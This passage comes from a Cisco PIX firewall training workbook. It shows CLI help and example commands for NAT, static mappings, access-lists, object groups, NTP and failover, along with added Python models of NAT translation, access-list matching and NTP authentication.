                (ii) identity translation for the <real_ip> option. The
                maximum nat_id with access-list is 65535. The maximum
                nat_id without access-list is 2147483647.
<local_ip>      The hosts/networks in this <nat_id> group.
                '0' indicates all networks or the default <nat_id> group
                An IP address not found in a more explicit <nat_id> group
                will default to a less explicit or '0', the least explicit
<mask>          The IP netmask to apply to <local_ip>.
dns             Use the created xlate to rewrite DNS address record.
tcp             TCP connections.
udp             UDP connections.
<max_conns>     The maximum number of simultaneous connections
                the <local_ip> hosts will each be allowed to use.
                Idle connections are closed after the time specified by the
                timeout conn command.
<emb_limit>     The maximum number of embryonic connections per host.
                An embryonic connection is a connection request that has not
                finished the necessary handshake between source and destination.
norandomseq     Disable TCP sequence number randomization.
<acl-name>      access-list name.
see also:
access-list, apply, global

myPIX (config)# nat ?
configure mode commands/options:
( Open parenthesis for the name of the network interface where
the hosts/network designated by the local IP address are accessed
myPIX (config)# nat (inside) ?
configure mode commands/options:
<0-2147483647> The <nat_id> of this group of hosts/networks. This <nat_id>
will be referenced by the global command to associate a
global pool with the local IP address. <nat_id> '0' is used
to indicate no address translation for local IP. The limit
is 65535 with access-lists
myPIX (config)# nat (inside) 1 ?
configure mode commands/options:
Hostname or A.B.C.D The hosts/networks in this <nat_id> group, '0' indicates
all networks or the default <nat_id> group
access-list
Specify access-list name after this keyword
myPIX (config)# nat (inside) 1 143.163.128.0 ?
configure mode commands/options:
A.B.C.D IP netmask to apply to the local IP address
<cr>
myPIX (config)# nat (inside) 1 143.163.128.0 255.255.192.0
myPIX (config)# help global
USAGE:
[no] global (<ext_if_name>) <nat_id> {<global_ip>[-<global_ip>] [netmask
<global_mask>]} | interface
DESCRIPTION:
global         Specify, delete or view global address pools,
               or designate a PAT(Port Address Translated) address
SYNTAX:
<(ext_if_name)> The external network interface name
<nat_id>       The id of the nat group(from the nat command) that
               will draw from these global addresses
<global_ip>    The IP address, network or range of addresses that will
               dynamically be translated on an as needed basis to hosts
               in the nat group <nat_id>.
               If this <ext_if_name> is connected to the Internet, the
               <global_ip> should be registered with the Network Information
               Center(NIC).
               These addresses should also be reverse resolvable(in-addr.arpa)
               on the outside DNS servers.
               An address specified singly will be used as a PAT address.
               When all of the non-PAT addresses of a global pool are in use
               and there is a PAT address, subsequent hosts from the nat
               group <nat_id> will share the single PAT address for up to
               the number of licensed connections.
[netmask <global_mask>] The netmask of the global_ip.
interface      IP address of <ext_if_name> overloaded for PAT.
see also:      nat, alias, static

myPIX (config)# global ?
configure mode commands/options:
( Open parenthesis for the external network interface name
myPIX (config)# global (outside) 3 ?
configure mode commands/options:
WORD
Enter IP address or a range of IP addresses <start_ip>[-<end_ip>]
interface Specifies PAT using the IP address at the interface
myPIX (config)# global (outside) 3 137.68.10.3-137.68.10.23 ?
configure mode commands/options:
netmask Specify netmask for the IP address(es) after this keyword
<cr>
myPIX (config)# global (outside) 3 1.2.3.4 net ?
configure mode commands/options:
A.B.C.D Netmask for the IP address(es)
myPIX (config)# global (outside) 3 137.68.10.3-137.68.10.23 netmask 255.255.255.0
myPIX (config)# show nat
myPIX (config)# show global

Example (Ver 7.x)
As Ver 6.x, but replace show nat and show global with:
myPIX (config)# show running nat
myPIX (config)# show running global
Note that the <nat_id> must match on the two commands: the pool defined with global (outside) 3 above is only used by hosts covered by a nat (inside) 3 statement, so with nat (inside) 1 the 143.163.128.0/18 hosts have no global pool to draw from and are not translated.

Cisco PIX Challenge 14


Outline
This challenge involves the configuration of a static (one-to-one) NAT mapping.
Objectives
The objectives of this challenge are to:

Define the IP address and subnet mask of the interfaces.
Define a static mapping.

Example (Ver 6.x)


myPIX (config)# ip address outside 84.120.11.5 255.128.0.0
myPIX (config)# ip address inside 10.10.0.1 255.128.0.0
myPIX (config)# ip address inf 172.16.0.1 255.128.0.0
myPIX (config)# show ip address
myPIX (config)# static (inside, outside) 84.120.11.15 211.204.152.13
myPIX (config)# show static

Example (Ver 7.x)


myPIX (config)# int e0
myPIX (config-if)# ip address 84.120.11.5 255.128.0.0
myPIX (config-if)# nameif outside
myPIX (config-if)# int e1
myPIX (config-if)# ip address 10.10.0.1 255.128.0.0
myPIX (config-if)# nameif inside
myPIX (config-if)# int e2
myPIX (config-if)# ip address 172.16.0.1 255.128.0.0
myPIX (config-if)# nameif inf2
myPIX (config-if)# exit

myPIX (config)# show ip address


myPIX (config)# help static
USAGE:
[no] static [(real_ifc, mapped_ifc)]
{<mapped_ip>|interface}
{<real_ip> [netmask <mask>]} | {access-list <acl_name>}
[dns]
[[tcp] <max_conns> [<emb_lim> [<norandomseq> [nailed]]]]
[udp <max_conns>]
[no] static [(real_ifc, mapped_ifc)] {tcp|udp}
{<mapped_ip>|interface} <mapped_port>
{<real_ip> <real_port> [netmask <mask>]} |
{access-list <acl_name>}
[dns]
[[tcp] <max_conns> [<emb_lim> [<norandomseq> [nailed]]]]
[udp <max_conns>]
DESCRIPTION:
static         Configure one-to-one address translation rule
SYNTAX:
<real_ifc>     Name of the network interface, as specified by 'nameif',
               where the hosts or networks designated by <real_ip> or
               sources in access-list are accessed.
<mapped_ifc>   Name of the network interface, as specified by 'nameif',
               where the <real_ip> or by the source in access-list are
               translated into <mapped_ip>.
tcp            TCP static PAT.
udp            UDP static PAT.
<real_ip>      Address as configured at the actual host.
<real_port>    Port as viewed from the actual host.
<mapped_ip>    Masquerade address of the <real_ip> or of the source
               address in access-list.
<mask>         The IP netmask to apply to <real_ip>.
<mapped_port>  Masquerade port of the <real_port> or of the source
               port in access-list.
interface      Address taken from <mapped_ifc>.
<acl_name>     The access-list name with the source fields defining
               the real address and real port, if applicable,
               before translation.
dns            Rewrite DNS address record.
norandomseq    Disable TCP sequence number randomization.
nailed         Allow TCP sessions for asymmetrically routed traffic
<max_conn>     The maximum number of simultaneous TCP connections that
               each <real_ip> host will be allowed to use. Idle
               connections are closed after the time specified by the
               timeout conn command.
<emb_limit>    Maximum number of embryonic connections per host. An
               embryonic connection is a connection request that has not
               completed TCP 3-way handshake between source and
               destination.
see also:      nat, global
myPIX (config)# static ?
configure mode commands/options:
( Open parenthesis for (<internal_if_name>,<external_if_name>) pair
where <internal_if_name> is the Internal or prenat interface and
<external_if_name> is the External or postnat interface
myPIX (config)# static (inside, outside) 84.120.11.15 211.204.152.13
myPIX (config)# show running static
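To make the xlate selection of Challenges 13 and 14 concrete, the following added Python models how a PIX picks a translation for an inside host: a static entry wins, otherwise the most specific nat statement's id selects a global pool, and a single-address global is shared for PAT once the pool is exhausted. This is example code written for this page, not NetworkSims or Cisco code; it ignores policy NAT, interface pairs and connection limits, and the Pix class, the two-address pool and the 137.68.10.50 PAT address are constructed for the demonstration. A second function reproduces the mismatch in the printed Challenge 13 example (nat_id 1 versus global id 3).

```python
"""Toy model of how a PIX chooses an xlate for an inside host (added example,
not NetworkSims or Cisco code). Ordering modelled, per Challenges 13 and 14:
1. a 'static' entry for the host wins; 2. otherwise the most specific 'nat'
statement covering the host selects a nat_id; 3. a free address from a
'global' range with that nat_id; 4. failing that, a single-address 'global'
(PAT) with that nat_id. Policy NAT, interface pairs and connection limits
from the help output are ignored."""
import ipaddress
from dataclasses import dataclass, field


@dataclass
class Nat:                 # nat (if_name) <nat_id> <local_ip> <mask>
    nat_id: int
    network: ipaddress.IPv4Network


@dataclass
class Global:              # global (ext_if_name) <nat_id> <global_ip>[-<global_ip>]
    nat_id: int
    start: ipaddress.IPv4Address
    end: ipaddress.IPv4Address      # start == end: a single address, used for PAT


@dataclass
class Pix:
    statics: dict = field(default_factory=dict)     # real_ip -> mapped_ip
    nats: list = field(default_factory=list)
    pools: list = field(default_factory=list)
    xlate: dict = field(default_factory=dict)       # real_ip -> (global, kind)
    next_port: int = 1024                           # PAT source ports, simplified

    def static(self, mapped_ip, real_ip):           # static (inside,outside) mapped real
        self.statics[real_ip] = mapped_ip

    def nat(self, nat_id, local_ip, mask):
        net = ipaddress.IPv4Network(f"{local_ip}/{mask}", strict=False)
        self.nats.append(Nat(nat_id, net))

    def global_(self, nat_id, spec):
        first, _, last = spec.partition("-")
        self.pools.append(Global(nat_id, ipaddress.IPv4Address(first),
                                 ipaddress.IPv4Address(last or first)))

    def translate(self, real_ip):
        """Return (global_address, kind) or None if no xlate can be built."""
        if real_ip in self.xlate:
            return self.xlate[real_ip]
        if real_ip in self.statics:                                  # 1. static
            return self.xlate.setdefault(real_ip, (self.statics[real_ip], "static"))
        addr = ipaddress.IPv4Address(real_ip)
        matches = [n for n in self.nats if addr in n.network]
        if not matches:
            return None
        nat = max(matches, key=lambda n: n.network.prefixlen)       # 2. most specific
        if nat.nat_id == 0:
            return self.xlate.setdefault(real_ip, (real_ip, "identity"))
        in_use = {g for g, kind in self.xlate.values() if kind == "dynamic"}
        pat = None
        for pool in (p for p in self.pools if p.nat_id == nat.nat_id):
            if pool.start == pool.end:
                if pat is None:
                    pat = pool.start
                continue
            ip = pool.start
            while ip <= pool.end:                                    # 3. free pool address
                if str(ip) not in in_use:
                    return self.xlate.setdefault(real_ip, (str(ip), "dynamic"))
                ip += 1
        if pat is not None:                                          # 4. share the PAT address
            port, self.next_port = self.next_port, self.next_port + 1
            return self.xlate.setdefault(real_ip, (f"{pat}:{port}", "pat"))
        return None                         # nat statement but no global with that id


def demo():
    """Challenge 13/14 statements with a deliberately tiny pool to force PAT."""
    pix = Pix()
    pix.static("84.120.11.15", "211.204.152.13")
    pix.nat(1, "143.163.128.0", "255.255.192.0")
    pix.global_(1, "137.68.10.3-137.68.10.4")     # constructed: two-address pool
    pix.global_(1, "137.68.10.50")                # constructed: single PAT address
    hosts = ["211.204.152.13", "143.163.128.10", "143.163.128.11",
             "143.163.128.12", "10.1.1.1"]
    return {h: pix.translate(h) for h in hosts}


def mismatch_demo():
    """Challenge 13 exactly as printed: nat_id 1 on 'nat' but 3 on 'global'."""
    pix = Pix()
    pix.nat(1, "143.163.128.0", "255.255.192.0")
    pix.global_(3, "137.68.10.3-137.68.10.23")
    return pix.translate("143.163.128.10")       # None: the pool is never selected
```

Running demo() gives the static host its fixed mapped address, the first two dynamic hosts the two pool addresses, the third host the PAT address with a port, and nothing for a host no nat statement covers; mismatch_demo() returns None, which is what a real PIX would show as a missing xlate.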

Cisco PIX Challenge 15


Outline
This challenge involves the configuration of the activation key.
Objectives
The objectives of this challenge are to:

Configure the activation key.


Show the activation key.

Example
myPIX # help activation-key
USAGE:
activation-key <activation-key-four-or-five-tuple>
show activation-key
DESCRIPTION:
activation-key

Modify activation-key.

SYNTAX:
<activation-key-four-or-five-tuple>
a four or five element hexadecimal string.
myPIX (config)# activation-key 1aa3aaab abfbcef1 133445ee ee56f6b0
myPIX (config)# show activation-key

Cisco PIX Challenge 16



Outline
This challenge involves the configuration of an access-list.
Objectives
The objectives of this challenge are to:

Define a named access-list.
Apply the access-list onto an interface.

Example
myPIX (config)# help access-l
USAGE:
Extended access list:
Use this to configure policy for IP traffic through the firewall
[no] access-list <id> [line <line_num>] [extended] {deny | permit}
{<protocol> | object-group <protocol_obj_grp_id>}
{host <sip> | <sip> <smask> |
object-group <network_obj_grp_id>}
[<operator> <port> [<port>] |
object-group <service_obj_grp_id>]
{<dip> <dmask> | object-group <network_obj_grp_id>}
[<operator> <port> [<port>] |
object-group <service_obj_grp_id>]
[log [disable] | [<level>] | [default] [interval <secs>]]
[no] access-list <id> [line <line_num>] {deny | permit} icmp
{host <sip> | <sip> <smask> |
object-group <network_obj_grp_id>}
{<dip> <dmask> | object-group <network_obj_grp_id>}
[<icmp_type> | object-group <icmp_type_obj_grp_id>]
[log [disable] | [<level>] | [default] [interval <secs>]]
[no] access-list <id> webtype {deny|permit}
url {<url-string>|any} [log {disable | default | level}
[interval <seconds>]] [time-range <name>] [inactive]
[no] access-list <id> webtype {deny | permit}
tcp {host <host-addr> | <dest-addr> <dest-mask> | any}
[{{EQ | NEQ | LT | GT} <port> | RANGE <port> <port>}]
[log {disable | default | <level>} [interval <seconds>]]
[time-range <name> ] [ inactive ]
[no] access-list <id> [line <line_num>] remark <text>
access-list deny-flow-max <n>
access-list alert-interval <secs>
Standard access list:
Use this to configure policy having destination host or network only
[no] access-list <id> standard {deny|permit} {any | <ip> <mask> | host <ip>}
[no] access-list <id> remark <text>
Generic Commands:
show access-list [<id>]
show running-config access-list
[alert-interval | deny-flow-max | <id>]
clear configure access-list [<id>]
clear access-list [<id> [counters]]
DESCRIPTION:
access-list    Add an access list
SYNTAX:
<id>           Access list number
<line_num>     Specify line number at which ACE should be entered
<webtype>      Use this to configure Web related policy
deny           Denies access if the conditions are matched.
permit         Permits access if the conditions are matched.
object-group   Keyword for specifying an object group.
obj_grp_id     Identifier of an existing object group.
remark         Specify a comment (remark)
<protocol>     The IP protocol name or number that will be open
               udp is 17, tcp is 6, gre is 47, etc.
<sip>          Source IP address
<smask>        Mask to be applied to <sip>
<dip>          Destination IP address
<dmask>        Mask to be applied to <dip>
<operator>     Compares <sip> or <dip> ports. Possible operands
               include lt (less than), gt (greater than), eq (equal), neq
               (not equal), and range (inclusive range).
<port>         The decimal number or name of a TCP or UDP port
<text>         comment (remark)
log            Keyword for enabling log option on this ACL element.
disable        Keyword for disabling log option on this ACL element.
default        Keyword for set log option on this ACL element to
               default values.
<level>        Optional syslog level (0-7); default level is 6.
interval       Keyword for specifying log interval.
<secs>         Optional log interval value (1-600); default is 300.
<icmp_type>    0 echo-reply, 3 unreachable, 4 source-quench, 5 redirect,
               6 alternate-address, 8 echo, 9 router-advertisement,
               10 router-solicitation, 11 time-exceeded,
               12 parameter-problem, 13 timestamp-request,
               14 timestamp-reply, 15 information-request,
               16 information-reply, 17 address-mask-request,
               18 address-mask-reply, 31 conversion-error or
               32 mobile-redirect
see also:      access-group, object-group
myPIX (config)# access-list uranus permit ip host 26.32.188.8 host 129.67.195.1
myPIX (config)# access-list uranus deny ip host 201.122.28.7 host 209.215.90.6
myPIX (config)# help access-g
USAGE:
[no] access-group <access-list> <in|out> interface <if_name> [per-user-override]
DESCRIPTION:
access-group   Bind an extended access-list to an interface to filter inbound
               traffic
SYNTAX:
<access-list>  Extended access list number
<in|out>       Inbound or Outbound access list
<if_name>      Name of the interface
per-user-override  Allow AAA downloaded per-user ACL to override
see also:      access-list, object-group
myPIX (config)# access-group uranus in interface outside
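Entries in the list bound above are evaluated top down, the first matching entry decides, and anything no entry matches is dropped by the implicit deny at the end of the list. The following added Python (example code for this page, not NetworkSims or Cisco code) parses the entry syntax shown in the help output and applies those first-match semantics to sample packets. The two entries for port 443 and ICMP echo-reply, the port-name table and the test addresses are constructed for the demonstration.

```python
"""First-match evaluation of PIX extended access-list entries (added example,
not NetworkSims or Cisco code). Handles the subset of the syntax in the help
output above: protocol ip/tcp/udp/icmp, 'host A', 'A MASK', 'any', the port
operators eq/neq/lt/gt/range, an ICMP type number, and the implicit deny
that follows the last entry."""
import ipaddress
from dataclasses import dataclass

PORT_NAMES = {"ftp": 21, "ssh": 22, "telnet": 23, "smtp": 25, "domain": 53,
              "www": 80, "ntp": 123, "https": 443}        # small subset of PIX names


def _port(tok):
    return int(tok) if tok.isdigit() else PORT_NAMES[tok]


def _parse_addr(toks):
    """Consume one address spec; return (network, remaining tokens)."""
    if toks[0] == "any":
        return ipaddress.IPv4Network("0.0.0.0/0"), toks[1:]
    if toks[0] == "host":
        return ipaddress.IPv4Network(toks[1] + "/32"), toks[2:]
    return ipaddress.IPv4Network(f"{toks[0]}/{toks[1]}", strict=False), toks[2:]


def _parse_ports(toks):
    """Consume an optional port operator; return (predicate, remaining tokens)."""
    if not toks or toks[0] not in ("eq", "neq", "lt", "gt", "range"):
        return (lambda p: True), toks
    if toks[0] == "range":
        lo, hi = _port(toks[1]), _port(toks[2])
        return (lambda p: lo <= p <= hi), toks[3:]
    v = _port(toks[1])
    ops = {"eq": lambda p: p == v, "neq": lambda p: p != v,
           "lt": lambda p: p < v, "gt": lambda p: p > v}
    return ops[toks[0]], toks[2:]


@dataclass
class Ace:
    action: str
    proto: str
    src: ipaddress.IPv4Network
    sport: object          # predicate on the source port
    dst: ipaddress.IPv4Network
    dport: object          # predicate on the destination port
    icmp_type: object = None


def parse_ace(line):
    """access-list <id> [line n] [extended] {permit|deny} <proto> <src> [op] <dst> [op|icmp_type]"""
    toks = line.split()
    i = 2                                  # toks[1] is the access-list id
    if toks[i] == "line":
        i += 2
    if toks[i] == "extended":
        i += 1
    action, proto, rest = toks[i], toks[i + 1], toks[i + 2:]
    src, rest = _parse_addr(rest)
    sport, rest = _parse_ports(rest)
    dst, rest = _parse_addr(rest)
    icmp_type, dport = None, (lambda p: True)
    if proto == "icmp":
        icmp_type = int(rest[0]) if rest and rest[0].isdigit() else None
    else:
        dport, rest = _parse_ports(rest)
    return Ace(action, proto, src, sport, dst, dport, icmp_type)


def evaluate(aces, proto, sip, dip, sport=0, dport=0, icmp_type=None):
    """First matching entry decides; return (action, index), index -1 = implicit deny."""
    s, d = ipaddress.IPv4Address(sip), ipaddress.IPv4Address(dip)
    for idx, a in enumerate(aces):
        if a.proto not in ("ip", proto):
            continue
        if s not in a.src or d not in a.dst:
            continue
        if a.proto in ("tcp", "udp") and not (a.sport(sport) and a.dport(dport)):
            continue
        if a.proto == "icmp" and a.icmp_type is not None and a.icmp_type != icmp_type:
            continue
        return a.action, idx
    return "deny", -1


ACL_LINES = [   # the two Challenge 16 entries, plus two constructed ones
    "access-list uranus permit ip host 26.32.188.8 host 129.67.195.1",
    "access-list uranus deny ip host 201.122.28.7 host 209.215.90.6",
    "access-list uranus permit tcp any host 129.67.195.1 eq https",
    "access-list uranus permit icmp any any 0",
]


def demo():
    """Sample packets arriving on 'outside', where 'access-group uranus in' applies."""
    aces = [parse_ace(l) for l in ACL_LINES if l.split()[1] == "uranus"]
    return {
        "ip_match": evaluate(aces, "tcp", "26.32.188.8", "129.67.195.1", 40000, 22),
        "explicit_deny": evaluate(aces, "udp", "201.122.28.7", "209.215.90.6", 5000, 53),
        "https_any": evaluate(aces, "tcp", "10.9.8.7", "129.67.195.1", 40001, 443),
        "http_any": evaluate(aces, "tcp", "10.9.8.7", "129.67.195.1", 40002, 80),
        "echo_reply": evaluate(aces, "icmp", "1.2.3.4", "5.6.7.8", icmp_type=0),
        "echo_request": evaluate(aces, "icmp", "1.2.3.4", "5.6.7.8", icmp_type=8),
    }
```

The index returned by evaluate is the entry that decided; -1 marks the implicit deny, which is what drops the HTTP and echo-request packets even though nothing in the list names them. Swapping the order of the permit and deny entries for the same host pair would change the outcome, which is the reason the help output offers a line number for inserting an ACE.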

Cisco PIX Challenge 17


Outline
This challenge involves the configuration of object groups.
Objectives


The objectives of this challenge are to:

Define a network object-group.
Define a protocol object-group.
Define an ICMP object-group.

Example
myPIX (config)# help object-group
USAGE:
[no] object-group protocol | network | icmp-type <obj_grp_id>
[no] object-group service <obj_grp_id> tcp|udp|tcp-udp
show running-config [all] object-group
[protocol | service | icmp-type | network]
show running-config [all] object-group id <obj_grp_id>
clear configure object-group [protocol | service | icmp-type | network]
DESCRIPTION:
object-group   Create an object group for use in 'access-list'
SYNTAX:
protocol       Specifies a group of protocols, such as TCP, etc
network        Specifies a group of host or subnet IP addresses
service        Specifies a group of TCP/UDP ports/services
icmp-type      Specifies a group of ICMP types, such as echo
<obj_grp_id>   The identifier for the object group:
               Must be 1 - 64 characters long, consisting of
               letters, digits, '-', '_', or '.'.
tcp|udp|tcp-udp  Specifies the protocol type for a service group;
               tcp - services provided via TCP only, such as ftp
               udp - services provided via UDP only, such as snmp
               tcp-udp - services provided via both TCP and UDP
show           Show object group(s) running config
clear          Remove existing object group(s) config
see also:      protocol-object, network-object,
               port-object, icmp-object, group-object
myPIX (config)# object-group network montana
myPIX(config-network)# exit
myPIX (config)# object-group protocol newyork
myPIX(config-protocol)# exit
myPIX (config)# object-group icmp-type birmingham
myPIX(config-icmp-type)# exit


Cisco PIX Challenge 18


Outline
This challenge involves the configuration of NTP.
Objectives
The objectives of this challenge are to:

Define the names of the interfaces.
Define the details of the NTP servers.

Example (Ver 6.x)


> enable
myPIX # config t
myPIX (config)# nameif e0 columbia security0
myPIX (config)# nameif e1 orkney security100
myPIX (config)# nameif e2 florida security50
myPIX (config)# ntp server 73.35.212.5 source columbia
myPIX (config)# ntp server 70.51.127.73 source orkney
myPIX (config)# ntp server 69.49.18.8 source florida
myPIX (config)# show ntp

Example (Ver 7.x)


> enable
myPIX # config t
myPIX (config)# int e0
myPIX (config-if)# nameif columbia
myPIX (config-if)# security-level 0
myPIX (config-if)# exit
myPIX (config)# int e1
myPIX (config-if)# nameif orkney
myPIX (config-if)# security-level 100
myPIX (config-if)# exit
myPIX (config)# int e2
myPIX (config-if)# nameif florida
myPIX (config-if)# security-level 50
myPIX (config-if)# exit
myPIX (config)# help ntp
USAGE:
ntp authenticate
no ntp authenticate
ntp authentication-key <number> md5 <value>
no ntp authentication-key <number> [md5 <value>]
ntp server <ip_address> [key <number>] [source <if_name>] [prefer]
no ntp server <ip_address> [key <number>] [source <if_name>] [prefer]
ntp trusted-key <number>
no ntp trusted-key <number>
show ntp [associations [detail] | status]
DESCRIPTION:
ntp

Configure Network Time Protocol

SYNTAX:
<if_name>      The interface name of the time server.
<ip_address>   The ip address of the time server.
<number>       The key number, range <1-4294967295>.
<value>        The key value. Key length range is <1-32>.
see also:      clock
myPIX (config)# ntp server ?
configure mode commands/options:
Hostname or A.B.C.D IP address of peer
myPIX (config)# ntp server 73.35.212.5 ?
configure mode commands/options:
key
Configure peer authentication key
prefer Prefer this peer when possible
source Interface for source address
<cr>
myPIX (config)# ntp server 73.35.212.5 source ?
configure mode commands/options:
Current available interface(s):
florida
Name of interface Ethernet2
orkney
Name of interface Ethernet1
columbia
Name of interface Ethernet0
myPIX (config)# ntp server 73.35.212.5 source columbia
myPIX (config)# ntp server 70.51.127.73 source orkney
myPIX (config)# ntp server 69.49.18.8 source florida
myPIX (config)# exit
myPIX # show ntp status
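The help output lists ntp authentication-key, ntp trusted-key and ntp authenticate, which the example above does not use; without them any host able to spoof a server's address can move the firewall's clock, and with it certificate validity checks and log timestamps. The added Python below, example code for this page rather than NetworkSims or Cisco code, shows what those commands provide: a client NTP header carrying the RFC 5905 symmetric-key MAC (key id followed by MD5 over key and header), and a receiver that rejects a tampered header or an untrusted key id. The key value, key id and timestamps are constructed.

```python
"""NTPv4 symmetric-key authentication, i.e. what 'ntp authentication-key <n>
md5 <value>', 'ntp trusted-key <n>' and 'ntp authenticate' add to the
unauthenticated 'ntp server' lines above (added example, not NetworkSims or
Cisco code). Per RFC 5905 the MAC appended to the 48-byte header is
key-id (4 bytes) || MD5(key || header) (16 bytes). Key, key id and
timestamps are constructed."""
import hashlib
import hmac
import struct

NTP_EPOCH_OFFSET = 2208988800        # seconds from 1900-01-01 to 1970-01-01
KEYS = {1: b"ntpk3y-orkney-2024"}    # ntp authentication-key 1 md5 ntpk3y-orkney-2024
TRUSTED = {1}                        # ntp trusted-key 1


def to_ntp_ts(unix_seconds):
    """Unix time (float) -> 64-bit NTP timestamp (32-bit seconds, 32-bit fraction)."""
    whole = int(unix_seconds) + NTP_EPOCH_OFFSET
    frac = int((unix_seconds - int(unix_seconds)) * (1 << 32))
    return (whole << 32) | frac


def build_request(tx_unix_seconds):
    """48-byte NTPv4 client header: LI=0, VN=4, mode=3; only Transmit Timestamp set."""
    li_vn_mode = (0 << 6) | (4 << 3) | 3
    head = struct.pack("!BBBbIII", li_vn_mode, 0, 0, 0, 0, 0, 0)   # stratum..ref id
    stamps = struct.pack("!QQQQ", 0, 0, 0, to_ntp_ts(tx_unix_seconds))
    return head + stamps


def sign(packet, key_id):
    """Append the symmetric-key MAC as the sender does for a configured key."""
    digest = hashlib.md5(KEYS[key_id] + packet).digest()
    return packet + struct.pack("!I", key_id) + digest


def verify(message):
    """Receiver side with 'ntp authenticate': return the header or None if rejected."""
    if len(message) != 48 + 4 + 16:
        return None
    packet, key_id, mac = message[:48], struct.unpack("!I", message[48:52])[0], message[52:]
    if key_id not in TRUSTED or key_id not in KEYS:    # the 'ntp trusted-key' gate
        return None
    expected = hashlib.md5(KEYS[key_id] + packet).digest()
    if not hmac.compare_digest(expected, mac):          # constant-time comparison
        return None
    return packet


def demo():
    pkt = build_request(1700000000.5)
    signed = sign(pkt, 1)
    # an on-path attacker rewrites the Transmit Timestamp (bytes 40..47 of the header)
    forged = bytearray(signed)
    forged[40:48] = struct.pack("!Q", to_ntp_ts(1700003600.0))
    # a spoofed server presents a MAC under a key id this firewall never trusted
    untrusted = signed[:48] + struct.pack("!I", 9) + signed[52:]
    return {
        "genuine": verify(signed) == pkt,
        "tampered": verify(bytes(forged)) is None,
        "untrusted_key": verify(untrusted) is None,
        "mac_len": len(signed) - 48,
    }
```

The MD5-over-key construction is what the md5 keyword in the help output refers to; it is a keyed digest rather than an encryption of the packet, so the key never leaves either host, but it only helps if the same key number is also listed with ntp trusted-key and ntp authenticate is turned on, which is the gate verify() models.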

Cisco PIX Challenge 19


Outline
This challenge involves the configuration of cable-based failover.
Objectives
The objectives of this challenge are to:

Enable failover.
Define failover addresses.
Define failover poll time.

Example (V6.x)
myPIX (config)# help fail
USAGE:
[no] failover
[no] failover polltime [unit] [msec] <time> [holdtime <seconds>]
[no] failover polltime interface <seconds>
[no] failover replication http
[no] failover lan unit primary|secondary
[no] failover interface ip <ifc_name> <ip_address> <mask> standby <ip_address>
[no] failover interface-policy <n>[%]
[no] failover key <shared_key>
[no] failover lan interface <ifc_name> <phyifc>[.<subifc_id>]
[no] failover link <ifc_name> [<phyifc>[.<subifc_id>]]
[no] failover mac address <phyifc> <act_mac> <stn_mac>
[no] failover timeout <hh:mm:ss>
[no] failover lan enable
[no] failover active
failover reset
failover reload-standby
show failover [history|interface|state|statistics]
DESCRIPTION:
failover

Configure failover feature

SYNTAX:
active
Make this the active unit of a failover pair
reset
Force both units back to an unfailed state
<ifc_name>
Interface name
<ip_address>
IP Address
<mask>
IP Netmask
<n>[%]
Number/percent of monitored interfaces causing failover
[unit] [msec] <time>
Unit poll interval (500msec-999msec, 1-15 seconds)
holdtime <seconds>
Unit holdtime (3-45 seconds)
polltime interface <seconds>
Interface poll interval (3-15 seconds)
replication http
Enable HTTP (port 80) connection replication
lan unit {primary|secondary}
Specify the unit as primary or secondary
lan interface
Specify the failover interface parameters
link
Specify the stateful interface parameters
interface ip
Specify IP and mask for failover/stateful interface
interface-policy
Specify interface monitoring failure policy
key <shared_key>
Specify failover encryption shared key
show failover
Display failover runtime info
mac address
Specify virtual mac address for a physical interface
<phyifc>
Physical interface name
<subifc_id>
Sub-interface id
<act_mac> <stn_mac>
Active and standby mac address
timeout
Specify failover reconnect timeout value for ASR sessions
lan enable
Enable LAN-Based failover on PIX platform
myPIX (config)# failover active
myPIX (config)# failover ip address outside 157.202.212.2
myPIX (config)# failover ip address inside 73.105.56.11
myPIX (config)# failover ip address inf2 166.209.230.11
myPIX (config)# failover poll 2

NetworkSims.com

468

myPIX (config)# show failover

Example (V7.x)
myPIX (config)# help fail
(same output as shown under Example (V6.x) above)
myPIX (config)# failover active
myPIX (config)# failover int ?
configure mode commands/options:
ip Configure the IP address and mask after this keyword
myPIX (config)# fai int ip ?
configure mode commands/options:
WORD Interface name
myPIX (config)# fai int ip ANY ?
configure mode commands/options:
Hostname or A.B.C.D Specify the IP address
myPIX (config)# fai int ip ANY 157.202.212.2 ?
configure mode commands/options:
A.B.C.D Specify the mask for the IP address
myPIX (config)# fai int ip ANY 157.202.212.2 255.255.255.0 ?
configure mode commands/options:
standby Configure the standby IP address after this keyword
myPIX (config)# fai int ip ANY 157.202.212.2 255.255.255.0 stan ?
configure mode commands/options:
Hostname or A.B.C.D Specify the IP address
myPIX (config)# fai int ip ANY 157.202.212.2 255.255.255.0 stan 157.202.212.3 ?
configure mode commands/options:
<cr>
myPIX (config)# failover interface ip outside 157.202.212.2 255.255.255.0 standby 157.202.212.3
myPIX (config)# failover interface ip inside 73.105.56.11 255.255.255.0 standby 73.105.56.12
myPIX (config)# failover interface ip inf2 166.209.230.11 255.255.255.0 standby 166.209.230.12
myPIX (config)# failover polltime 2
myPIX (config)# show running failover

Cisco PIX Challenge 20


Outline
This challenge involves the configuration of failover for a primary device over a LAN.

Objectives
The objectives of this challenge are to:

Enable failover.
Define failover addresses.
Define failover parameters.

Example (V6.x)
myPIX (config)# failover active
myPIX (config)# failover ip address outside 157.202.212.2
myPIX (config)# failover ip address inside 73.105.56.11
myPIX (config)# failover ip address inf2 166.209.230.11
myPIX (config)# failover poll 2
myPIX (config)# failover lan key mypix
myPIX (config)# failover lan unit primary
myPIX (config)# failover lan interface inf2
myPIX (config)# failover lan enable
myPIX (config)# show failover

Example (V7.x)
myPIX (config)# failover ?
configure mode commands/options:
interface
Configure the IP address and mask to be used for failover
and/or stateful update information
interface-policy Set the policy for failover due to interface failures
key
Configure the failover shared secret
lan
Specify the unit as primary or secondary or configure the
interface and vlan to be used for failover communication
link
Configure the interface and vlan to be used as a link for
stateful update information
mac
Specify the virtual mac address for a physical interface
polltime
Configure failover poll interval
replication
Enable HTTP (port 80) connection replication
timeout
Specify the failover reconnect timeout value for
asymmetrically routed sessions
<cr>
exec mode commands/options:
active
Make this system to be the active unit of the failover pair
reload-standby Force standby unit to reboot
reset
Force an unit or failover group to an unfailed state
myPIX (config)# failover active
myPIX (config)# failover int ?
configure mode commands/options:
ip Configure the IP address and mask after this keyword
myPIX (config)# fai int ip ?
configure mode commands/options:
WORD Interface name
myPIX (config)# fai int ip ANY ?
configure mode commands/options:
Hostname or A.B.C.D Specify the IP address
myPIX (config)# fai int ip ANY 157.202.212.2 ?
configure mode commands/options:
A.B.C.D Specify the mask for the IP address
myPIX (config)# fai int ip ANY 157.202.212.2 255.255.255.0 ?
configure mode commands/options:
